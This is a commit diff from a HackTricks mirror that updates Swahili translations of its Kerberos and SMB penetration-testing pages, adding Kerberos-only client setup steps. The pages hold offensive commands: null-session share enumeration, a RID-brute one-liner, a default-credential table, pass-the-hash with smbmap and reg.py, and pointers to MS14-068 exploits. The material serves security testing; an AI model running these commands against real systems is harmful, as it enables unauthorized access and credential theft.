maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-smb/README.md',

Browse Source
This commit is contained in:
Translator 2025-09-29 09:39:07 +00:00
parent 12175d56e6
commit 4da68715d1
4 changed files with 431 additions and 304 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
src/network-services-pentesting/pentesting-kerberos-88/README.md
View File

@ -2,20 +2,57 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Taarifa za Msingi
**Kerberos** inafanya kazi kwa kanuni ambapo inathibitisha watumiaji bila moja kwa moja kusimamia ufikiaji wao kwa rasilimali. Hii ni tofauti muhimu kwa sababu inasisitiza jukumu la itifaki katika mifumo ya usalama.
**Kerberos** inafanya kazi kwa kanuni inayothibitisha watumiaji bila kusimamia moja kwa moja ufikiaji wao wa rasilimali. Hii ni tofauti muhimu kwa sababu inaonyesha nafasi ya itifaki katika mifumo ya usalama.
Katika mazingira kama **Active Directory**, **Kerberos** ni muhimu katika kuanzisha utambulisho wa watumiaji kwa kuthibitisha nywila zao za siri. Mchakato huu unahakikisha kwamba utambulisho wa kila mtumiaji unathibitishwa kabla ya kuingiliana na rasilimali za mtandao. Hata hivyo, **Kerberos** haipanui kazi zake ili kutathmini au kutekeleza ruhusa ambazo mtumiaji anazo juu ya rasilimali au huduma maalum. Badala yake, inatoa njia salama ya kuthibitisha watumiaji, ambayo ni hatua muhimu ya kwanza katika mchakato wa usalama.
Katika mazingira kama **Active Directory**, **Kerberos** ina jukumu muhimu katika kuthibitisha utambulisho wa watumiaji kwa kudhibitisha nywila zao za siri. Mchakato huu huhakikisha kuwa utambulisho wa kila mtumiaji unathibitishwa kabla ya kuingiliana na rasilimali za mtandao. Hata hivyo, **Kerberos** haigusi utendaji wake ili kutathmini au kutekeleza ruhusa ambazo mtumiaji ana kwa rasilimali au huduma maalum. Badala yake, inatoa njia salama ya kuthibitisha watumiaji, ambayo ni hatua muhimu ya kwanza katika mchakato wa usalama.
Baada ya uthibitisho na **Kerberos**, mchakato wa kufanya maamuzi kuhusu ufikiaji wa rasilimali unakabidhiwa kwa huduma binafsi ndani ya mtandao. Huduma hizi zinawajibika kutathmini haki na ruhusa za mtumiaji aliyethibitishwa, kulingana na taarifa iliyotolewa na **Kerberos** kuhusu haki za mtumiaji. Muundo huu unaruhusu kutenganisha masuala kati ya kuthibitisha utambulisho wa watumiaji na kusimamia haki zao za ufikiaji, na kuwezesha njia yenye kubadilika na salama ya usimamizi wa rasilimali katika mitandao iliyosambazwa.
Baada ya uthibitisho na **Kerberos**, mchakato wa uamuzi kuhusu ufikiaji wa rasilimali unaachwa kwa huduma za mtu binafsi ndani ya mtandao. Huduma hizi ndizo zinazonajibika kutathmini haki na ruhusa za mtumiaji aliyethibitishwa, kwa msingi wa taarifa zilizotolewa na **Kerberos** kuhusu haki za mtumiaji. Muundo huu unaruhusu utofauti wa majukumu kati ya kuthibitisha utambulisho wa watumiaji na kusimamia haki zao za ufikiaji, na hivyo kuwezesha njia ya kusimamia rasilimali kuwa yenye kubadilika zaidi na salama katika mitandao iliyogatuliwa.
**Default Port:** 88/tcp/udp
**Bandari ya Chaguo-msingi:** 88/tcp/udp
```
PORT STATE SERVICE
88/tcp open kerberos-sec
```
### **Ili kujifunza jinsi ya kutumia Kerberos unapaswa kusoma chapisho kuhusu** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
### **Ili kujifunza jinsi ya kutumia vibaya Kerberos unapaswa kusoma chapisho kuhusu** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
## Mazingira yenye Kerberos pekee: maandalizi ya mteja na utatuzi wa matatizo
Wakati NTLM imezimwa kwenye huduma za domain (SMB/WinRM/n.k.), lazima uthibitike kwa Kerberos. Mambo ya kuzingatia na mtiririko wa kazi unaofanya kazi:
- Ulinganifu wa saa ni wa lazima. Ikiwa saa ya mwenyeji wako imepishana kwa zaidi ya dakika chache utaona `KRB_AP_ERR_SKEW` na uthibitisho wote wa Kerberos utashindwa. Linganisha dhidi ya DC:
```bash
# quick one-shot sync (requires sudo)
sudo ntpdate <dc.fqdn> || sudo chronyd -q 'server <dc.fqdn> iburst'
```
- Tengeneza krb5.conf halali kwa realm/domain lengwa. `netexec` (CME fork) inaweza kutoa moja kwa ajili yako wakati wa kujaribu SMB:
```bash
# Generate krb5.conf and install it
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
```
- Pata TGT na uhakikishe ccache:
```bash
kinit <user>
klist
```
- Tumia Kerberos na zana za SMB (hakuna nywila zinatumwa, inatumia ccache yako):
```bash
# netexec / CME
netexec smb <dc.fqdn> -k # lists shares, runs modules using Kerberos
# impacket examples also support -k / --no-pass to use the ccache
smbclient --kerberos //<dc.fqdn>/IPC$
```
- GSSAPI SSH kuingia mara moja (OpenSSH kwa Windows OpenSSH server):
```bash
# Ensure krb5.conf is correct and you have a TGT (kinit)
# Use the FQDN that matches the host SPN. Wrong names cause: "Server not found in Kerberos database"
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Tips:
- Hakikisha `/etc/hosts` inatambua (resolves) FQDN kamili utakayofikia kwa SSH/SMB, na kwamba iko kabla ya rekodi za domain zisizo na jina la host (bare domain entries) ikiwa unabadilisha DNS. SPN mismatches husababisha GSSAPI kuvunjika.
- Ikiwa NTLM imezimwa kwenye SMB unaweza kuona `STATUS_NOT_SUPPORTED` wakati wa majaribio ya NTLM; ongeza `-k` kulazimisha Kerberos.
## Zaidi
@ -25,16 +62,23 @@ PORT STATE SERVICE
### MS14-068
Kasoro ya MS14-068 inaruhusu mshambuliaji kubadilisha tokeni ya kuingia ya Kerberos ya mtumiaji halali ili kudai kwa uwongo mamlaka ya juu, kama vile kuwa Msimamizi wa Domain. Dai hili la uongo linathibitishwa kwa makosa na Kituo cha Domain, likiwezesha ufikiaji usioidhinishwa wa rasilimali za mtandao katika msitu wa Active Directory.
Hitilafu ya MS14-068 inamruhusu mdhambi kuharibu tokeni ya kuingia ya Kerberos ya mtumiaji halali ili kudai kwa udanganyifu vibali vya juu, kama vile kuwa Domain Admin. Dai hili bandia linathibitishwa kwa makosa na Domain Controller, ikiruhusu upatikanaji usioidhinishwa wa rasilimali za mtandao katika msitu wa Active Directory.
{{#ref}}
https://adsecurity.org/?p=541
{{#endref}}
Mifano mingine: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
## HackTricks Amri za Otomatiki
## Marejeo
- [NetExec (CME) wiki Kerberos and krb5.conf generation](https://www.netexec.wiki/)
- [OpenSSH GSSAPIAuthentication](https://man.openbsd.org/ssh_config#GSSAPIAuthentication)
- [MIT Kerberos Using Kerberos on UNIX](https://web.mit.edu/kerberos/krb5-1.12/doc/user/user_config.html)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: Kerberos #Protocol Abbreviation if there is one.
Port_Number: 88 #Comma separated if there is more than one.

210
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -4,43 +4,43 @@
## **Port 139**
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kusaidia usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi katika mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa hadi herufi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (inayofanya kazi kama mteja) inatoa amri ya "kuita" programu nyingine (inayofanya kazi kama seva) kwa kutumia **TCP Port 139**.
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kurahisisha uhamishaji wa data kupitia mtandao**. Utambulisho na eneo la programu zinazoendesha kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na hadi herufi 16 kwa urefu na mara nyingi ni tofauti na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili huanzishwa wakati programu moja (inayoitumikia kama client) inatoa amri ya "call" kwa programu nyingine (inayoitumikia kama server) ikitumia **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Kiufundi, Port 139 inarejelewa kama NBT over IP, huku Port 445 ikitambulika kama SMB over IP. Kifupi **SMB** kinamaanisha **Server Message Blocks**, ambayo pia kisasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao katika safu ya programu, SMB/CIFS hutumiwa hasa kuwezesha upatikanaji wa pamoja wa faili, printa, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kiteknikali, Port 139 inatajwa kama NBT over IP, wakati Port 445 inatambulika kama SMB over IP. Herufi fupi **SMB** inasimama kwa **Server Message Blocks**, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya tabaka la programu kwenye mtandao, SMB/CIFS hutumika hasa kuwezesha upatikanaji wa pamoja wa faili, printers, serial ports, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kwa mfano, katika muktadha wa Windows, inaelezwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kwa kutumia Port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya Port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa kwa kushirikiana na NetBIOS juu ya TCP/IP.
Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa haja ya NetBIOS over TCP/IP, kwa kutumia port 445. Kwa upande mwingine, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa sambamba na NetBIOS over TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, imeundwa kudhibiti **ufikiaji wa faili**, direktori, na rasilimali nyingine za mtandao kama printers na routers. Imetumika hasa ndani ya mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa Microsoft kuingiliana bila tatizo na vilivyo kwenye matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, kuruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya cross-platform kupitia SMB.
Protokoli ya **Server Message Block (SMB)**, inayofanya kazi kwa mfano wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama printa na router. Kimsingi hutumika ndani ya mfululizo wa mfumo wa uendeshaji **Windows**, SMB hutoa uthabiti wa kurudi nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa uendeshaji wa **Microsoft** kuwasiliana kwa urahisi na vinavyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu ya bure, likiruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya kuvuka-platform kupitia SMB.
Shares, zinazoonyesha **arbitrary parts of the local file system**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa hierarchy uonekane kwa mteja kwa namna inayokuwa kwa sehemu **independent** na muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **access rights**, zinaruhusu **fine-grained control** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
Shares, zinazoonyesha **sehemu yoyote ya mfumo wa faili wa eneo**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa saraka uonekane kwa mteja kwa sehemu **huru** kutoka muundo halisi wa server. **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa undani** wa ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au makundi, kulingana na shares, na ni tofauti na ruhusa za eneo zilizoanzishwa kwenye server.
### IPC$ Share
Ufikiaji wa share ya IPC$ unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility ya `enum4linux` ni muhimu kwa madhumuni haya. Ikiotumika ipasavyo, inaruhusu upokezi wa:
Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, ikiruhusu mwingiliano na huduma zilizoonyeshwa kupitia named pipes. Zana ya `enum4linux` ni muhimu kwa lengo hili. Ikiotumika kwa usahihi, inaruhusu kupata:
- Taarifa kuhusu mfumo wa uendeshaji
- Maelezo juu ya parent domain
- Orodha ya watumiaji na vikundi vya ndani
- Taarifa juu ya SMB shares zinazopatikana
- Maelezo kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Orodha ya watumiaji na makundi wa ndani
- Taarifa kuhusu SMB shares zinazopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Uwezo huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini nafasi ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaoweza kuwepo na kuhakikisha kwamba huduma za SMB zimetunzwa ipasavyo.
Utendaji huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB kwenye mtandao. `enum4linux` huwapa mtazamo kamilifu wa mazingira ya SMB ya mfumo lengwa, jambo la msingi kwa kubaini udhaifu unaoweza kutumika na kuhakikisha kuwa huduma za SMB zimeshika usalama ipasavyo.
```bash
enum4linux -a target_ip
```
Amri hapo juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya target iliyobainishwa kama `target_ip`.
The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`.
## NTLM ni nini
Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana, ambapo umeelezewa **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
Ikiwa haujui NTLM ni nini au unataka kuelewa jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** wa kuvutia, unaoelezea **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
{{#ref}}
../../windows-hardening/ntlm/
@ -48,16 +48,16 @@ Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya ku
## **Server Enumeration**
### **Scan** mtandao kutafuta hosts:
### **Scan** a network searching for hosts:
```bash
nbtscan -r 192.168.0.1/24
```
### Toleo la seva la SMB
### Toleo la server la SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haionekani katika zana nyingine zinazotumika, unaweza:
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua ni toleo gani linatumika. Ikiwa taarifa hii haitokei kwenye zana nyingine zinazotumika, unaweza:
- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Au skripti hii:
- Au script hii:
```bash
#!/bin/sh
#Author: rewardone
@ -74,28 +74,28 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Utafutaji wa exploit**
### **Tafuta exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Vinavyowezekana** Vyeti
### **Inawezekana** Credentials
| **Jina la Mtumiaji(s)** | **Manenosiri ya kawaida** |
| ----------------------- | --------------------------------------- |
| _(bure)_ | _(bure)_ |
| guest | _(bure)_ |
| Administrator, admin | _(bure)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### Brute Force
- [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb)
### Taarifa za Mazingira ya SMB
### Taarifa za Mazingira za SMB
### Pata Taarifa
```bash
@ -119,7 +119,7 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Orodhesha Watumiaji, Vikundi & Watumiaji Waliyeingia
### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa na enum4linux na enum4linux-ng
```bash
@ -139,7 +139,7 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
Oneliner
Mstari mmoja
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
@ -149,28 +149,28 @@ use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Kuorodhesha LSARPC and SAMR rpcclient**
### **Kuorodhesha LSARPC na SAMR rpcclient**
{{#ref}}
rpcclient-enumeration.md
{{#endref}}
### GUI connection from linux
### Muunganisho wa GUI kutoka linux
#### Katika terminal:
`xdg-open smb://cascade.htb/`
#### Katika file browser window (nautilus, thunar, etc)
#### Katika dirisha la kivinjari cha faili (nautilus, thunar, n.k)
`smb://friendzone.htb/general/`
## Uorodhesha wa Folda Zilizoshirikiwa
## Kuorodhesha Folda Zilizoshirikiwa
### Orodhesha folda zilizoshirikiwa
Inashauriwa kila wakati kuangalia kama unaweza kupata chochote; ikiwa huna credentials, jaribu kutumia **null** **credentials/guest user**.
Kila mara inashauriwa kuangalia kama unaweza kupata chochote; kama huna credentials jaribu kutumia **null** **credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -196,11 +196,9 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Orodhesha kwa mikono windows shares na kujiunga nazo**
### **Orodhesha kwa mkono windows shares na kuziunganisha**
Inawezekana kwamba umezuiwa kuonyesha shares zozote za mashine mwenyeji, na unapojaribu kuziorodhesha inaonekana kama hakuna shares za kuunganishwa nazo. Kwa hivyo inaweza kufaa kujaribu kwa muda mfupi kuunganishwa kwa mikono kwenye share.
Ili kuorodhesha shares kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapotumia valid session (mfano null session or valid credentials). Hii inaweza kuonyesha ikiwa share ipo na wewe huna ufikiaji wake, au share haipo kabisa.
Inawezekana umezuiliwa kuonyesha shares yoyote za mashine mwenyeji, na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares zozote za kuunganishwa. Hivyo, inaweza kuwa vyema kujaribu kwa mkono kuungana kwenye share. Ili kuorodhesha shares kwa mkono, unaweza kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, ukiwa unatumia kikao halali (kwa mfano null session au valid credentials). Haya yanaweza kuashiria ikiwa share ipo na wewe huna ruhusa ya kuipata, au share haipo kabisa.
Common share names for windows targets are
@ -213,9 +211,9 @@ Common share names for windows targets are
- SYSVOL
- NETLOGON
(Majina ya kawaida ya shares kutoka _**Network Security Assessment 3rd edition**_)
(Common share names from _**Network Security Assessment 3rd edition**_)
Unaweza kujaribu kuunganishwa nazo kwa kutumia amri ifuatayo
Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
@ -239,10 +237,10 @@ done
```
mifano
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Orodhesha shares kutoka Windows / bila zana za mtu wa tatu**
### **Orodhesha shares kutoka Windows / bila zana za wahusika wa tatu**
PowerShell
```bash
@ -254,30 +252,30 @@ get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
Konsoli ya CMD
konsoli ya CMD
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (ya grafiki)
MMC Snap-in (grafiki)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizofichwa zinazopatikana.
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona non-hidden shares zinazopatikana.
### Unganisha shared folder
### Unganisha folda iliyoshirikiwa
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Pakua mafaili**
Soma sehemu zilizopita ili ujifunze jinsi ya kuunganishwa kwa kutumia credentials/Pass-the-Hash.
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -292,16 +290,16 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
Commands:
Amri:
- mask: inabainisha mask inayotumika kuchuja faili ndani ya saraka (kwa mfano "" kwa faili zote)
- recurse: hubadilisha recursion kuwa imewezeshwa (chaguo-msingi: imezimwa)
- prompt: hugeuza kuulizwa kwa majina ya faili (chaguo-msingi: imewezeshwa)
- mget: kunakili faili zote zinazolingana na mask kutoka kwenye host kwenda kwenye client machine
- mask: inaelezea mask ambayo inatumiwa kuchuja faili ndani ya saraka (mfano: "" kwa faili zote)
- recurse: hugeuza recursion kuwa on (default: off)
- prompt: huzimisha kuuliza majina ya faili (default: on)
- mget: inakopi faili zote zinazolingana na mask kutoka host hadi client machine
(_Taarifa kutoka kwenye manpage ya smbclient_)
### Utafutaji wa Folda Zinazoshirikiwa za Domain
### Utafutaji wa Folda Zilizoshirikiwa za Domain
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
@ -313,15 +311,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Chini ya shares, zinazovutia hasa ni mafaili yanayoitwa **`Registry.xml`**, kwa kuwa zinaweza kuwa na **passwords** za watumiaji waliowekwa na **autologon** kupitia **Group Policy**. Pia mafaili ya **`web.config`** yanaweza kuwa na **credentials**.
Kinachovutia hasa kutoka shares ni faili zinazoitwa **`Registry.xml`**, kwani zinaweza **kuwa na passwords** za watumiaji waliowekwa na **autologon** kupitia Group Policy. Au faili za **`web.config`** kwa kuwa zina credentials.
> [!TIP]
> The **SYSVOL share** inasomeka na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **find** batch tofauti, VBScript, na PowerShell **scripts**.\
> Unapaswa **check** **scripts** zilizomo ndani yake kwani unaweza **find** taarifa nyeti kama **passwords**.
> The **SYSVOL share** inaweza **kusomwa** na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\
> Unapaswa **kuangalia** **scripts** zilizo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**.
## Soma Registry
## Read Registry
Unaweza kuwa na uwezo wa **read the registry** kwa kutumia baadhi ya credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
Unaweza **read the registry** kwa kutumia credentials ulizozigundua. Impacket **`reg.py`** inakuwezesha kujaribu:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
@ -329,35 +327,49 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
```
## Post Exploitation
Usanidi wa **chaguo-msingi** wa seva ya **Samba** kwa kawaida upo katika `/etc/samba/smb.conf` na unaweza kuwa na baadhi ya **usanidi hatari**:
Mipangilio ya chaguo-msingi ya seva ya **Samba** kwa kawaida iko katika `/etc/samba/smb.conf` na inaweza kuwa na **mipangilio hatari**:
| **Mipangilio** | **Maelezo** |
| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana? |
| `read only = no` | Kuzuia uundaji na uhariri wa faili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri faili? |
| `guest ok = yes` | Kuruhusu kuunganishwa na huduma bila kutumia nenosiri? |
| `enable privileges = yes` | Kuheshimu vibali vilivyotolewa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa faili mpya zinazoundwa? |
| `directory mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa saraka mpya? |
| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Script gani inapaswa kutekelezwa script inapofungwa? |
| `magic output = script.out` | Wapi matokeo ya magic script yanapaswa kuhifadhiwa? |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
| `read only = no` | Kuzuia uundaji na uhariri wa mafaili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri mafaili? |
| `guest ok = yes` | Kuruhusu kuunganishwa kwa huduma bila kutumia nenosiri? |
| `enable privileges = yes` | Kuheshimu vibali vilivyotangazwa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa mafaili yaliyoundwa hivi karibuni? |
| `directory mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa directory mpya zilizoundwa? |
| `logon script = script.sh` | Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? |
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **nani ameunganishwa**.
## Thibitisha kwa kutumia Kerberos
## Thibitisha kwa kutumia kerberos
Unaweza **kuthibitisha** kwa **Kerberos** ukitumia zana **smbclient** na **rpcclient**:
Unaweza **kuthibitisha** kwa **kerberos** ukitumia zana **smbclient** na **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Endesha Amri**
In mazingira ya Kerberos pekee (NTLM imezimwa), jaribio za NTLM dhidi ya SMB zinaweza kurudisha `STATUS_NOT_SUPPORTED`. Rekebisha matatizo ya kawaida ya Kerberos na lazimisha uthibitishaji wa Kerberos:
```bash
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
```
Kwa ajili ya usanidi kamili wa mteja (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) angalia:
{{#ref}}
../pentesting-kerberos-88/README.md
